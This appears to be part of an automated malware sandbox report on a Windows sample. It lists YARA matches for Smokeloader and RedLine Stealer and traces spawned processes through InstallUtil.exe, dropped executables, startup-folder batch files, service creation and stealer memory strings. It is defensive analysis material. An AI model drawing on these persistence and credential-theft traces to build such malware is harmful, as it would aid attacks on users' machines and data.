                    Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000019.00000002.2841630563.00000000004F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@179/370@0/100
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009C0EC0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,17_2_009C0EC0
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | Code function: 14_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,15_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,15_2_00455E0C
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: CreateServiceA,16_2_004028A4
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: CreateServiceA,17_2_004028A4
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Code function: 21_2_00402988 CoCreateInstance,MultiByteToWideChar,21_2_00402988
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | Code function: 14_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,14_2_00409C34
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 16_2_0040D234 StartServiceCtrlDispatcherA,16_2_0040D234
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_0040D234 StartServiceCtrlDispatcherA,17_2_0040D234
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_004026E9 StartServiceCtrlDispatcherA,17_2_004026E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\ZSwgvRB1MVwrU7ijKh97GNss.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:45400:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:44776:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1892
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:45016:120:WilError_03
                    Source: C:\Windows\System32\svchost.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b0344492-8518-4351-9354-89b6b44ee76f
                    Source: Yara match | File source: 17.0.simplewebbuilder.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.0.simplewebbuilder.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000011.00000000.2392543907.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.3339978515.0000000000401000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000000.2385672788.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Simple Web Builder Free\is-L72V0.tmp, type: DROPPED
                    Source: Yara match | File source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, type: DROPPED
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" "
                    Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: file.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: syncUpd.exe, 00000016.00000003.3061841029.0000000020E5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: syncUpd.exe, 00000016.00000002.3566095069.000000001AD82000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3635595627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: file.exe | Virustotal: Detection: 34%
                    Source: JgqIdYSSt70LQLRUqfTzKJw8.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" "
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat" "
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe "C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | Process created: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp "C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Process created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Process created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat" "
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe "C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe"
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Process created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | Process created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe "C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe "C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe"
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe "C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe "C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe "C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe "C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe "C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe "C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe "C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe "C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe "C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe "C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe"
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe | Process created: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp "C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: unknown unknown
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
                    Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                    Source: C:\Windows\System32\WerFault.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe Process created: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp "C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Process created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Process created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe Process created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe Process created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe Process created: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp "C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe Process created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe Process created: unknown unknown
                    Source: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe Process created: unknown unknown
